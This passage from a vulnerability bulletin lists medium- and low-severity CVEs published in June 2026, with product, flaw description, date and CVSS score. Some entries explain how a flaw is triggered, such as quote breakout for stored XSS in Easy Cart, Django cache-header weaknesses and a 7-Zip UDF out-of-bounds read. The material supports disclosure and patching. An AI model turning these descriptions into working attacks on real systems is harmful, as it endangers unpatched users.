| wpdevteam--Essential Addons for Elementor Popular Elementor Templates & Widgets | The Essential Addons for Elementor - Popular Elementor Templates & Widgets plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 6.6.4 via the ajax_load_more function due to insufficient restrictions on which posts can be included. This makes it possible for unauthenticated attackers to extract data from password protected, private, or draft posts that they should not have access to. | 2026-06-06 | 5.3 | CVE-2026-7665 |
| zauberzeug--nicegui | NiceGUI is a Python-based UI framework. Prior to version 3.12.0, two FastAPI routes that serve per-component static assets in NiceGUI accept a sub-path parameter that may resolve to a directory rather than a file. Requests that resolve to a directory raise an unhandled RuntimeError inside Starlette's FileResponse, which Uvicorn writes to the server log as a full traceback. Because the routes are reachable without authentication, a remote attacker can amplify log volume and consume disk and log-pipeline capacity on any publicly reachable NiceGUI server. This issue has been patched in version 3.12.0. | 2026-06-02 | 5.3 | CVE-2026-45554 |
| zephyrproject-rtos--Zephyr | A potential out-of-bounds write/read exists in the TLS socket connect path of the network sockets subsystem (subsys/net/lib/sockets/sockets_tls.c). When the TLS session cache is enabled, tls_session_store() and tls_session_restore() memcpy the caller-supplied address into a fixed-size buffer using the caller-controlled addrlen value without validating it against the destination size. struct net_sockaddr is an opaque type, so an application can pass an addrlen larger than sizeof(struct net_sockaddr) (for example 128 bytes into a 24-byte stack buffer), causing the memcpy to read and write past the end of the address memory used by the TLS session cache. This out-of-bounds write can lead to a crash and denial of service, and potentially to arbitrary code execution. | 2026-06-04 | 6.3 | CVE-2026-5066 |
| zeshanb--Easy Cart | The Easy Cart plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'add_to_cart' shortcode in all versions up to and including 1.8. This is due to insufficient input sanitization and output escaping on user-supplied shortcode attributes. Specifically, the ectp_add_to_cart() function uses sanitize_text_field() on shortcode attributes like 'itemid', 'product_name', 'product_desc', 'product_qty', and 'price' before inserting them into double-quoted HTML attributes. While sanitize_text_field() strips HTML tags, it does not escape double quote characters, allowing an attacker to break out of the HTML attribute context and inject arbitrary event handlers. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-06-02 | 6.4 | CVE-2026-4080 |
| zeuscart--ZeusCart | ZeusCart 4.0 contains a cross-site request forgery vulnerability that allows attackers to perform unauthorized actions on behalf of victims by crafting malicious requests. Attackers can deactivate customer accounts via the admin interface by tricking users into visiting attacker-controlled pages that submit requests to the regstatus endpoint with action=deny parameters. | 2026-06-01 | 5.3 | CVE-2018-25435 |
| zilliztech--deep-searcher | A weakness has been identified in zilliztech deep-searcher up to 0.0.2. This affects the function CollectionRouter.invoke of the file deepsearcher/agent/collection_router.py. This manipulation of the argument kwargs causes improper access controls. Remote exploitation of the attack is possible. The exploit has been made available to the public and could be used for attacks. The pull request to fix this issue awaits acceptance. | 2026-06-07 | 5.4 | CVE-2026-11466 |
| Znuny--Znuny | In Znuny LTS before 6.5.21 and Znuny before 7.3.3, there is reflected XSS in AdminCommunicationLog (aka the communication log administration view). | 2026-06-05 | 6.4 | CVE-2026-50592 |
| Znuny--Znuny | In Znuny LTS before 6.5.21 and Znuny before 7.3.3, XSS can occur via stored user preferences. | 2026-06-05 | 5.4 | CVE-2026-50591 |
| Zyxel--VMG4005-B50B firmware | A buffer overflow vulnerability in the UPnP AddPortMapping() command in Zyxel VMG4005-B50B firmware versions through 5.13(ABRL.5.4)C0 could allow an adjacent attacker to trigger a temporary denial-of-service (DoS) condition affecting the UPnP function of the affected device. | 2026-06-02 | 6.5 | CVE-2026-3870 |
| Zyxel--VMG4005-B50B firmware | A buffer overflow vulnerability in the UPnP DeletePortMapping() command in Zyxel VMG4005-B50B firmware versions through 5.13(ABRL.5.4)C0 could allow an adjacent attacker to trigger a temporary denial-of-service (DoS) condition affecting the UPnP function of the affected device. | 2026-06-02 | 6.5 | CVE-2026-3871 |
Low Vulnerabilities
| Primary Vendor -- Product |
Description | Published | CVSS Score | Source Info |
|---|---|---|---|---|
| 1Panel-dev--CordysCRM | A security vulnerability has been detected in 1Panel-dev CordysCRM up to 1.4.1. This impacts the function Save of the file src/main/java/cn/cordys/crm/system/service/ModuleFormService.java of the component ModuleFormController. The manipulation of the argument Description leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed publicly and may be used. Upgrading to version 1.7.0 will fix this issue. The identifier of the patch is c87682afa8df79853299f75489c9d333f7bc5fce. Upgrading the affected component is recommended. | 2026-06-02 | 3.5 | CVE-2026-10567 |
| 1Panel-dev--CordysCRM | A vulnerability has been found in 1Panel-dev CordysCRM up to 1.6.2. This affects an unknown function of the file backend/framework/src/main/java/cn/cordys/config/RequestParamTrimConfig.java. The manipulation leads to cross site scripting. Remote exploitation of the attack is possible. The exploit has been disclosed to the public and may be used. Upgrading to version 1.7.0 mitigates this issue. The identifier of the patch is c87682afa8df79853299f75489c9d333f7bc5fce. It is suggested to upgrade the affected component. | 2026-06-01 | 2.4 | CVE-2026-10514 |
| Aiven-Open--klaw | Klaw is a self-service Apache Kafka Topic Management/Governance tool/portal. Prior to version 2.10.4, a vulnerability exists in the user registration and login mechanisms due to inconsistent handling of username case sensitivity, leading to a targeted Denial of Service (DoS) and complete account lockout. This issue has been patched in version 2.10.4. | 2026-06-02 | 2.7 | CVE-2026-44367 |
| Assimp--Assimp | A security vulnerability has been detected in Assimp up to 6.0.4. Affected by this issue is the function HL1MDLLoader::read_sequence_infos of the file HL1MDLLoader.cpp of the component Half-Life 1 MDL Loader. The manipulation of the argument aiString leads to out-of-bounds read. The attack needs to be performed locally. The exploit has been disclosed publicly and may be used. The project tagged the reported issue as bug. | 2026-06-01 | 3.3 | CVE-2026-10233 |
| bytedance--InfiniStore | A vulnerability was found in bytedance InfiniStore up to 0.2.33. The impacted element is the function purge_kv_map in the library /src/infinistore.h of the component KV Map Handler. Performing a manipulation results in inefficient algorithmic complexity. The attack requires a local approach. The exploit has been made public and could be used. The project was informed of the problem early through an issue report but has not responded yet. | 2026-06-05 | 3.3 | CVE-2026-11312 |
| cilium--ebpf | A vulnerability has been found in cilium ebpf up to 0.21.0. This affects the function loadRawSpec of the file btf/btf.go of the component LoadCollectionSpec/LoadCollectionSpecFromReader. Such manipulation of the argument offset leads to integer overflow. The attack can only be performed from a local environment. The exploit has been disclosed to the public and may be used. The name of the patch is 533dfc82fd228bfadf42ea7180c39de7d9af47fa. A patch should be applied to remediate this issue. | 2026-06-03 | 3.3 | CVE-2026-10722 |
| code-projects--Online Hospital Management System | A weakness has been identified in code-projects Online Hospital Management System 1.0. This issue affects some unknown processing of the file viewdoctortimings.php. This manipulation of the argument delid causes improper control of resource identifiers. The attack can be initiated remotely. The exploit has been made available to the public and could be used for attacks. | 2026-06-01 | 3.8 | CVE-2026-10299 |
| dask--dask | A flaw has been found in dask up to 3.0. Affected by this issue is the function nunique_approx of the file dask/dataframe/hyperloglog.py of the component HLL Handler. This manipulation causes resource consumption. The attack is possible to be carried out remotely. A high degree of complexity is needed for the attack. The exploitation is known to be difficult. The pull request to fix this issue awaits acceptance. | 2026-06-03 | 3.1 | CVE-2026-10705 |
| djangoproject--daphne | daphne before 4.2.2 reconstructs a raw HTTP request from Twisted's parsed headers and feeds it to autobahn for WebSocket handshake processing. Twisted does not treat \x0b, \x0c, \x1c, \x1d, \x1e, or \x85 as header line separators, but autobahn decodes header values to str and calls splitlines(). An attacker can exploit this parser differential to inject additional headers into the ASGI scope passed to the application. daphne now rejects requests with these bytes in any header value with a 400 response. | 2026-06-03 | 3.7 | CVE-2026-44546 |
| djangoproject--Django | An issue was discovered in Django 5.2 before 5.2.15 and 6.0 before 6.0.6. `django.middleware.cache.UpdateCacheMiddleware` in Django does not add `Authorization` to the `Vary` response header for requests bearing that header without `Cache-Control: public`, which allows remote attackers to read private cached responses via unauthenticated requests to the same URL. Earlier, unsupported Django series (such as 5.0.x, 4.1.x, and 3.2.x) were not evaluated and may also be affected. Django would like to thank Shai Berger for reporting this issue. | 2026-06-03 | 3.1 | CVE-2026-35193 |
| djangoproject--Django | An issue was discovered in Django 5.2 before 5.2.15 and 6.0 before 6.0.6. `django.utils.cache.has_vary_header()` in Django does not strip leading or trailing whitespace from `Vary` response header values before comparison, which allows remote attackers to read cached responses via requests to URLs whose responses contain whitespace-padded Vary header values. Earlier, unsupported Django series (such as 5.0.x, 4.1.x, and 3.2.x) were not evaluated and may also be affected. Django would like to thank Navid Rezazadeh for reporting this issue. | 2026-06-03 | 3.1 | CVE-2026-48587 |
| djangoproject--Django | An issue was discovered in Django 6.0 before 6.0.6 and 5.2 before 5.2.15. `django.http.HttpRequest.get_signed_cookie` in Django uses a non-injective salt derivation (concatenating the cookie name and salt argument), which allows a remote attacker to use a cookie in a context different from the one where it was signed, via distinct `(name, salt)` pairs that produce the same concatenation. Earlier, unsupported Django series (such as 5.0.x, 4.1.x, and 3.2.x) were not evaluated and may also be affected. Django would like to thank Peng Zhou for reporting this issue. | 2026-06-03 | 3.1 | CVE-2026-6873 |
| djangoproject--Django | An issue was discovered in Django 6.0 before 6.0.6 and 5.2 before 5.2.15. `django.core.mail.backends.smtp.EmailBackend` in Django fails to prevent reuse of a partially-initialized connection after a failed `STARTTLS` handshake when `fail_silently=True`, which allows on-path network attackers to read email content via cleartext interception. Earlier, unsupported Django series (such as 5.0.x, 4.1.x, and 3.2.x) were not evaluated and may also be affected. Django would like to thank Kasper Dupont for reporting this issue. | 2026-06-03 | 3.1 | CVE-2026-7666 |
| djangoproject--Django | An issue was discovered in Django 5.2 before 5.2.15 and 6.0 before 6.0.6. `django.middleware.cache.UpdateCacheMiddleware` in Django does not match `Cache-Control` response directives case-insensitively, which allows remote attackers to read responses that were incorrectly cached because their `Cache-Control` directives used uppercase or mixed-case values. Earlier, unsupported Django series (such as 5.0.x, 4.1.x, and 3.2.x) were not evaluated and may also be affected. Django would like to thank Ahmed Badawe for reporting this issue. | 2026-06-03 | 3.1 | CVE-2026-8404 |
| FluentCMS--FluentCMS | A weakness has been identified in FluentCMS 0.0.5. The impacted element is an unknown function of the file /admin/blocks of the component Blocks Plugin. This manipulation causes cross site scripting. The attack may be initiated remotely. The exploit has been made available to the public and could be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-06-06 | 2.4 | CVE-2026-11434 |
| ggml-org--whisper.cpp | A security flaw has been discovered in ggml-org whisper.cpp up to 1.8.2. This vulnerability affects the function whisper_model_load of the file ggml/src/ggml.c. The manipulation results in null pointer dereference. Attacking locally is a requirement. The exploit has been released to the public and may be used for attacks. The project was informed of the problem early through an issue report but has not responded yet. | 2026-06-01 | 3.3 | CVE-2026-10298 |
| gradio-app--gradio | A security flaw has been discovered in gradio-app gradio 6.14.0. This affects the function save_audio_to_cache of the component Audio Cache Key Handler. Performing a manipulation results in use of weak hash. The attack must be initiated from a local position. The attack is considered to have high complexity. It is indicated that the exploitability is difficult. The exploit has been released to the public and may be used for attacks. The patch is named 13394. To fix this issue, it is recommended to deploy a patch. | 2026-06-03 | 2.5 | CVE-2026-10783 |
| HCL--iControl | HCL iControl was affected by Missing Cookie Attributes vulnerability. It was observed that the application is missing several critical cookie attributes, including Secure and SameSite. And also path is set to root. | 2026-06-04 | 3.1 | CVE-2025-52608 |
| HCL--iControl | HCL iControl was affected by Missing Security Headers vulnerability. which lead to cross-site scripting (XSS) attacks by enabling the built-in XSS filtering mechanisms of modern web browsers. | 2026-06-04 | 3.7 | CVE-2025-52609 |
| HCL--iControl | HCL iControl v4.0.0 was affected by Unhandled Exception - Stack Trace Disclosure vulnerability. The error occurs due to an undefined property being accessed in the application's JavaScript code. Specifically, the code attempts to read the property dashboard key from an object that is undefined. This issue likely stems from one of the following: A missing or improperly initialized object. | 2026-06-04 | 3.1 | CVE-2025-52611 |
| HCL--iReflection | HCL iReflection Third party vulnerable and outdated components issue was detected in the web application | 2026-06-02 | 3.1 | CVE-2024-42206 |
| HCLSoftware--BigFix Cloud Lifecycle Management | HCL BigFix Cloud Lifecycle Management is affected by lack of input validation. This low-level flaw allows unauthorized access and may lead to information exposure. | 2026-06-04 | 3.3 | CVE-2025-62338 |
| janet-lang--janet | A security flaw has been discovered in janet-lang janet up to 1.41.0. This affects the function doframe of the file src/core/debug.c. Performing a manipulation results in out-of-bounds read. Attacking locally is a requirement. The exploit has been released to the public and may be used for attacks. The patch is named ed17dd2c5913a23fb1107251e44a9410a3c30cf5. | 2026-06-01 | 3.3 | CVE-2026-10267 |
| janet-lang--janet | A weakness has been identified in janet-lang janet up to 1.41.0. This vulnerability affects the function unmarshal_one_fiber of the file src/core/marsh.c. Executing a manipulation can lead to integer overflow. It is possible to launch the attack on the local host. The exploit has been made available to the public and could be used for attacks. This patch is called d9b1d711ea1fde52ac73a82088b512a3e17bad0d. A patch should be applied to remediate this issue. | 2026-06-01 | 3.3 | CVE-2026-10268 |
| JeecgBoot--JeecgBoot | A vulnerability was identified in JeecgBoot up to 3.9.2. Affected by this vulnerability is the function queryPageList of the file src\main\java\org\jeecg\modules\system\controller\SysUserController.java of the component User List Endpoint. The manipulation of the argument salt leads to information disclosure. The attack may be initiated remotely. The attack is considered to have high complexity. The exploitation appears to be difficult. The exploit is publicly available and might be used. A fix is planned for the upcoming release. | 2026-06-07 | 3.1 | CVE-2026-11464 |
| kiteworks--Secure Data Forms | Kiteworks is a private data network (PDN). Prior to version 9.3.0, an Insecure Direct Object Reference (IDOR) vulnerability in Kiteworks Secure Data Forms allows an authenticated user to access metadata of resources belonging to other users due to insufficient authorization checks on resource ownership. Upgrade Kiteworks to version 9.3.0 or later to receive a patch. | 2026-06-01 | 3.7 | CVE-2026-24761 |
| lharries--whatsapp-mcp | A vulnerability was determined in lharries whatsapp-mcp 0.0.1. Affected by this vulnerability is the function SendMessageRequest of the file whatsapp-bridge/main.go of the component Send API Endpoint. This manipulation of the argument mediaPath causes path traversal. The exploit has been publicly disclosed and may be utilized. Patch name: 6657cdceadd361e8fbe824afe9d00b4504009a5d. It is recommended to apply a patch to fix this issue. | 2026-06-01 | 3.5 | CVE-2026-10264 |
| LMCache--LMCache | A flaw has been found in LMCache up to 0.4.6. This affects the function hex_hash_to_int16 of the file lmcache/integration/vllm/utils.py of the component KV Cache Handler. Executing a manipulation can lead to use of weak hash. The attack needs to be launched locally. The attack requires a high level of complexity. It is indicated that the exploitability is difficult. The exploit has been published and may be used. The pull request to fix this issue awaits acceptance. | 2026-06-04 | 3.6 | CVE-2026-10813 |
| mcmilk--7-Zip | 7-Zip is a file archiver with a high compression ratio. Versions 9.11 through 26.00 contain a heap out-of-bounds read of up to 3 bytes in the UDF disc image handler's File Identifier Descriptor parser. In CFileId::Parse (CPP/7zip/Archive/Udf/UdfIn.cpp), after validating size < 38 + idLen + impLen and advancing processed to 38 + impLen + idLen, the alignment-padding loop reads p[processed] while incrementing up to 3 times to reach a 4-byte boundary, and the processed <= size bounds check only runs after the loop. When (38 + impLen + idLen) % 4 != 0 and 38 + impLen + idLen == size, the loop reads 1 to 3 bytes past the end of the exact-size heap buffer allocated via buf.Alloc((size_t)item.Size). The UDF handler is registered for .iso and .udf files and auto-detected by signature, and the OOB read triggers during Open() when listing or extracting a crafted UDF image. Impact is limited to information disclosure (a 1-bit oracle per OOB byte via open/fail behavior) and denial of service (crash under hardened allocators); there is no write primitive. Version 26.01 fixes the issue. | 2026-06-05 | 3.1 | CVE-2026-48102 |
| Mettle--sendportal | A vulnerability was detected in Mettle sendportal up to 3.0.1. This affects an unknown part of the file /webview/ of the component Campaign Handler. The manipulation of the argument content results in cross site scripting. The attack can be launched remotely. The exploit is now public and may be used. The project was informed of the problem early through an issue report but has not responded yet. | 2026-06-01 | 3.5 | CVE-2026-10234 |
| MLflow--MLflow | A flaw has been found in MLflow up to 3.10.0. This issue affects the function mlflow.data.digest_utils of the file mlflow/data/digest_utils.py of the component Dataset Digest Computation. This manipulation causes use of weak hash. It is possible to launch the attack on the local host. The attack is considered to have high complexity. The exploitability is assessed as difficult. The exploit has been published and may be used. The project was informed of the problem early through a pull request but has not reacted yet. | 2026-06-04 | 3.6 | CVE-2026-10803 |
| mlrun--mlrun | A vulnerability has been found in mlrun up to 1.12.0-rc3. This impacts the function mlrun.utils.helpers.calculate_dataframe_hash of the file mlrun/utils/helpers.py of the component DataFrame Hash Handler. The manipulation leads to use of weak hash. The attack can only be performed from a local environment. The complexity of an attack is rather high. The exploitability is said to be difficult. The exploit has been disclosed to the public and may be used. The pull request to fix this issue awaits acceptance. | 2026-06-03 | 3.6 | CVE-2026-10766 |
| modelscope--ms-swift | A security vulnerability has been detected in modelscope ms-swift up to 4.2.0. This affects the function Template._save_pil_image of the file swift/template/base.py of the component PIL Image Cache Key Handler. The manipulation leads to use of weak hash. An attack has to be approached locally. A high degree of complexity is needed for the attack. It is indicated that the exploitability is difficult. The exploit has been disclosed publicly and may be used. The pull request to fix this issue awaits acceptance. | 2026-06-04 | 3.6 | CVE-2026-10801 |
| nextcloud--security-advisories | Nextcloud is an open source content collaboration platform. From versions 1.15.0 to before 1.15.4, 1.16.0 to before 1.16.3, 1.17.0 to before 1.17.1, and 1.18.0 to before 1.18.1, a malicious user with access to an end-to-end encrypted files drop link was able to also drop files into other end-to-end encrypted folders of the share owner. Reading and modifying of other files was not possible. This issue has been patched in versions 1.15.4, 1.16.3, 1.17.1, 1.18.1, and 2.0.0-rc.7. | 2026-06-01 | 3.5 | CVE-2026-45159 |
| nextcloud--security-advisories | Nextcloud is an open source content collaboration platform. Prior to versions 21.1.10, 22.0.11, and 23.0.3, a low-privileged user can force other user's microphones to be muted in calls when no High-performance Backend is installed. This issue has been patched in versions 21.1.10, 22.0.11, and 23.0.3. | 2026-06-01 | 3.5 | CVE-2026-45266 |
| nextcloud--security-advisories | Nextcloud is an open source content collaboration platform. Prior to version 2.7.2, authenticated users can check if arbitrary files are associated with specific approval workflows where they can request approval. This issue has been patched in version 2.7.2. | 2026-06-01 | 3.3 | CVE-2026-45277 |
| nextcloud--security-advisories | Nextcloud is an open source content collaboration platform. From version 6.1.0 to before version 8.2.2, an attacker can craft links that would redirect users to another website, when the victim uses the attackers link to log in via user OIDC. This issue has been patched in version 8.2.2. | 2026-06-01 | 3.3 | CVE-2026-45278 |
| nextcloud--security-advisories | Nextcloud is an open source content collaboration platform. From version 2.6.0 to before version 4.3.0, when a previous collective pages was deleted and the collective was shared view-only, guests with access to the collective were able to access the deleted pages directly from the trashbin. This issue has been patched in version 4.3.0. | 2026-06-01 | 2.6 | CVE-2026-45154 |
| nextcloud--security-advisories | Nextcloud is an open source content collaboration platform. In Nextcloud Server from versions 32.0.0 to before 32.0.7 and 33.0.0 to before 33.0.1, a missing access check on API level allowed to add unknown circles by their ID directly to other circles. Since circle IDs have 62^15 complexity by default this is still unlikely to be executable at will, but if access to an ID was available via another source, memberships could be tracked like this. It is recommended that the Nextcloud Server is upgraded to 32.0.7 or 33.0.1. It is recommended that the Nextcloud Enterprise Server is upgraded to 29.0.16.14, 30.0.17.8, 31.0.14.3, 32.0.7 or 33.0.1 | 2026-06-01 | 2.6 | CVE-2026-45155 |
| onnx--onnx-mlir | A vulnerability has been found in onnx onnx-mlir up to 0.5.0.0. Affected by this issue is the function generate_hash_key of the file src/Runtime/python/torch_onnxmlir/src/torch_onnxmlir/backend.py of the component Placeholder Node Cache Handler. Such manipulation leads to use of weak hash. An attack has to be approached locally. A high complexity level is associated with this attack. The exploitation is known to be difficult. The name of the patch is 72c5187ff6d13c2c2b3d3789b8f5faf99f08a5b4. Applying a patch is advised to resolve this issue. | 2026-06-05 | 3.6 | CVE-2026-11329 |
| open-telemetry--opentelemetry-ebpf-instrumentation | OpenTelemetry eBPF Instrumentation provides eBPF instrumentation based on the OpenTelemetry standard. Prior to version 0.9.0, the Java TLS ioctl probe reads user-controlled ioctl pointers with bpf_probe_read instead of bpf_probe_read_user. An instrumented local process can therefore point OBI at kernel memory and cause that memory to be copied into telemetry. This issue has been patched in version 0.9.0. | 2026-06-02 | 3.8 | CVE-2026-45683 |
| Open5GS--Open5GS | A security flaw has been discovered in Open5GS up to 2.7.6. The impacted element is the function gmm_state_security_mode of the file src/amf/gmm-sm.c of the component NGAP Handover. Performing a manipulation results in race condition. The attack can be initiated remotely. The complexity of an attack is rather high. The exploitability is regarded as difficult. The exploit has been released to the public and may be used for attacks. The pull request to fix this issue awaits acceptance. | 2026-06-02 | 3.1 | CVE-2026-10565 |
| OpenStack--Neutron | In OpenStack Neutron before 28.0.1, a project manager can create or update a port on a shared network owned by another project and set device_owner to a value that has "network:" at the beginning ("network:dhcp" for example). The default port RBAC policies incorrectly included PROJECT_MANAGER without requiring network ownership, allowing any project manager to obtain trusted network-service port behavior on shared networks. Depending on backend and deployment, this can bypass anti-spoofing and security group protections, enabling DHCP, MAC, or IP spoofing against other tenants on the shared network. This is a regression of CVE-2015-5240 (OSSA-2015-018). | 2026-06-04 | 2.2 | CVE-2026-50266 |
| Orthanc--DICOM Server | A security flaw has been discovered in Orthanc DICOM Server up to 1.12.11. This issue affects the function DcmItem::read of the file OrthancFramework/Sources/DicomParsing/FromDcmtkBridge.cpp of the component DCMTK Parser. Performing a manipulation results in stack-based buffer overflow. Attacking locally is a requirement. The exploit has been released to the public and may be used for attacks. The patch is named bae99026ca97. To fix this issue, it is recommended to deploy a patch. | 2026-06-02 | 3.3 | CVE-2026-10528 |
| OTRS AG--OTRS | An incorrect handling of permissions in OTRS External Interface and the ConfigItem List module allows an authenticated customer to query the system for CI information. Please note that CMDB has to be anabled and CustomerGroupSupport has to be used to be affected. This issue affects OTRS: * 7.0.X * 8.0.X * 2023.X * 2024.X * 2025.X * 2026.X before 2026.4.X | 2026-06-01 | 3.5 | CVE-2026-48190 |
| OTRS AG--OTRS | An incorrect handling of permissions in STORM powered by OTRS and in OTRS (2026.x and above) Document Search Article Meta Filters modules allows gaining knowledge about number of affected CIs, SLA and services without gaining access to them. This issue affects OTRS with STORM modules: * 7.0.X * 8.0.X * 2023.X * 2024.X * 2025.X * 2026.X before 2026.4.X | 2026-06-01 | 3.5 | CVE-2026-48191 |
| PaddlePaddle--FastDeploy | A weakness has been identified in PaddlePaddle FastDeploy up to 2.4.1. Affected by this issue is the function hash_features of the file fastdeploy/multimodal/hasher.py of the component MultimodalHasher. Executing a manipulation can lead to use of weak hash. The attack requires local access. A high complexity level is associated with this attack. The exploitation is known to be difficult. This patch is called 374945747652a8d32965591c0c01a00c88b7067f. Applying a patch is advised to resolve this issue. | 2026-06-04 | 3.6 | CVE-2026-10800 |
| projectcapsule--capsule | Capsule is a multi-tenancy and policy-based framework for Kubernetes. To defend against namespace hijacking achieved through update/patch operations on namespaces, Capsule uses a webhook to validate update requests targeting namespaces. However, in Kubernetes, the namespace/finalize and namespace/status subresource APIs can also modify various fields of a namespace, including the metadata field. Prior to version 0.13.0, the webhook does not define interception rules for these subresources. As a result, if a tenant administrator has permission to modify namespace/status or namespace/finalize, they can successfully perform namespace hijacking. Version 0.13.0 fixes the issue. Another mitigation is to add two subresources (namespaces and snamespaces/status with namespace/finalize within it) to the resources list in the ValidatingWebhookConfiguration rules. | 2026-06-01 | 3.9 | CVE-2026-30963 |
| raisulislamg4--student_management_system_by_php | A vulnerability was found in raisulislamg4 student_management_system_by_php up to 310d950e09013d5133c6b9210aff9444382d16d1. The impacted element is an unknown function of the file admission_form_check.php. The manipulation of the argument Message results in cross site scripting. The attack can be executed remotely. The exploit has been made public and could be used. This product implements a rolling release for ongoing delivery, which means version information for affected or updated releases is unavailable. The project was informed of the problem early through an issue report but has not responded yet. | 2026-06-01 | 3.5 | CVE-2026-10228 |
| Red Hat--Red Hat Build of Keycloak | A flaw was found in org.keycloak.services. An administrator with delegated access to read group memberships and users can bypass user profile permissions by accessing the group members endpoint. This allows the administrator to view user attributes that are explicitly configured to be denied, leading to information disclosure. | 2026-06-05 | 2.7 | CVE-2026-9088 |
| Red Hat--Red Hat Enterprise Linux 10 | A flaw was found in gnutls. The PKCS#7 padding check, performed during decryption, was not constant-time. This timing side-channel could allow a remote attacker to potentially leak sensitive information about the padding bytes through observable timing differences. This vulnerability is a form of information disclosure. | 2026-06-01 | 3.7 | CVE-2026-5419 |
| SecureAge--CatchPulse | A security vulnerability has been detected in SecureAge CatchPulse up to 10.9.1. Impacted is an unknown function in the library saappctl.sys of the component IOCTL Handler. The manipulation leads to information disclosure. Local access is required to approach this attack. The exploit has been disclosed publicly and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-06-07 | 3.3 | CVE-2026-11459 |
| sgl-project--SGLang | A vulnerability was determined in sgl-project SGLang up to 0.5.11. Affected by this vulnerability is the function data_hash of the component Cache Handler. This manipulation causes denial of service. The attack is restricted to local execution. A high degree of complexity is needed for the attack. The exploitation appears to be difficult. The exploit has been publicly disclosed and may be utilized. The pull request to fix this issue awaits acceptance. | 2026-06-03 | 3.6 | CVE-2026-10775 |
| SGLang--SGLang | A security vulnerability has been detected in SGLang 0.5.10.post1. Impacted is an unknown function of the file python/sglang/srt/lora/lora_manager.py of the component Inference HTTP Endpoint. Such manipulation of the argument lora_path leads to reachable assertion. The attack can be launched remotely. A high complexity level is associated with this attack. The exploitability is considered difficult. The exploit has been disclosed publicly and may be used. The pull request to fix this issue awaits acceptance. | 2026-06-01 | 3.7 | CVE-2026-10300 |
| songquanpeng--one-api | A security flaw has been discovered in songquanpeng one-api up to 0.6.11-preview.7. Affected by this issue is the function Redeem of the file model/redemption.go of the component Redemption Code Top-Up Endpoint. The manipulation results in business logic errors. The attack may be launched remotely. The attack requires a high level of complexity. The exploitation is known to be difficult. The exploit has been released to the public and may be used for attacks. The pull request to fix this issue awaits acceptance. | 2026-06-07 | 3.1 | CVE-2026-11465 |
| SourceCodester--Customer Review App | A vulnerability was found in SourceCodester Customer Review App 1.0. Affected by this vulnerability is the function add_review/save_review/get_all_reviews of the file review_app.py. Performing a manipulation of the argument name/comment results in denial of service. The attack requires a local approach. The exploit has been made public and could be used. | 2026-06-01 | 3.3 | CVE-2026-10295 |
| SourceCodester--Hospitals Patient Records Management System | A vulnerability was detected in SourceCodester Hospitals Patient Records Management System 1.0. This issue affects some unknown processing of the file /admin/?page=room_types. Performing a manipulation of the argument room results in cross site scripting. The attack is possible to be carried out remotely. The exploit is now public and may be used. | 2026-06-07 | 2.4 | CVE-2026-11468 |
| SourceCodester--Pharmacy Sales and Inventory System | A vulnerability was detected in SourceCodester Pharmacy Sales and Inventory System 1.0. Affected by this vulnerability is the function create_medicine_name of the file /ShowForm/create_medicine_name/main. Performing a manipulation of the argument medicine_name results in cross site scripting. The attack can be initiated remotely. The exploit is now public and may be used. | 2026-06-01 | 3.5 | CVE-2026-10244 |
| SourceCodester--Pharmacy Sales and Inventory System | A flaw has been found in SourceCodester Pharmacy Sales and Inventory System 1.0. Affected by this issue is the function create_supplier of the file /ShowForm/create_supplier/main. Executing a manipulation of the argument company_name can lead to cross site scripting. The attack can be launched remotely. The exploit has been published and may be used. | 2026-06-01 | 3.5 | CVE-2026-10245 |
| SourceCodester--Pharmacy Sales and Inventory System | A vulnerability has been found in SourceCodester Pharmacy Sales and Inventory System 1.0. This affects the function create_medicine_presentation of the file /ShowForm/create_medicine_presentation/main. The manipulation of the argument medicine_presentation leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. | 2026-06-01 | 3.5 | CVE-2026-10246 |
| SourceCodester--Pharmacy Sales and Inventory System | A vulnerability was found in SourceCodester Pharmacy Sales and Inventory System 1.0. This vulnerability affects the function create_generic_name of the file /ShowForm/create_generic_name/main. The manipulation of the argument generic_name results in cross site scripting. The attack may be launched remotely. The exploit has been made public and could be used. | 2026-06-01 | 3.5 | CVE-2026-10247 |
| SourceCodester--Ship Ferry Ticket Reservation System | A security vulnerability has been detected in SourceCodester Ship Ferry Ticket Reservation System 1.0. Impacted is an unknown function of the file /admin/?page=user/manage_user. The manipulation of the argument Username leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed publicly and may be used. | 2026-06-05 | 2.4 | CVE-2026-11338 |
| Steamlit--Streamlit | A vulnerability has been found in Streamlit up to 1.53.0. Impacted is an unknown function in the library lib/streamlit/runtime/caching/hashing.py of the component Palette Handler. Such manipulation leads to use of weak hash. Local access is required to approach this attack. The attack requires a high level of complexity. The exploitability is considered difficult. The exploit has been disclosed to the public and may be used. The pull request to fix this issue awaits acceptance. | 2026-06-04 | 3.6 | CVE-2026-10804 |
| strawberry-graphql--strawberry | Strawberry GraphQL is a library for creating GraphQL APIs. In versions 0.288.4 through 0.315.3, Strawberry's bundled GraphiQL template wrote values from the GraphiQL headers editor into the browser URL query string. If a user entered a sensitive header, such as `Authorization: Bearer <token>`, the value could become visible in browser history, copied links, and server/proxy/CDN access logs after a page reload or shared request. Version 0.315.4 patches the issue. | 2026-06-04 | 3.1 | CVE-2026-45739 |
| thedotmack--claude-mem | A weakness has been identified in thedotmack claude-mem up to 11.0.1. The affected element is the function computeObservationContentHash of the file src/services/sqlite/observations/store.ts of the component Observation Content Hash Handler. This manipulation causes use of weak hash. The attack can only be executed locally. The attack's complexity is rated as high. The exploitability is described as difficult. Upgrading to version 12.0.0 is sufficient to fix this issue. Patch name: f32fda8b35e9fe9329f87da65c31149362a03f97. It is suggested to upgrade the affected component. | 2026-06-05 | 3.6 | CVE-2026-11330 |
| unitedbyai--droidclaw | A vulnerability was detected in unitedbyai droidclaw up to 0.5.3. The affected element is an unknown function of the file server/src/routes/pairing.ts of the component claim Endpoint. The manipulation results in improper restriction of excessive authentication attempts. The attack may be launched remotely. This attack is characterized by high complexity. The exploitability is described as difficult. The exploit is now public and may be used. The project was informed of the problem early through an issue report but has not responded yet. | 2026-06-01 | 3.7 | CVE-2026-10216 |
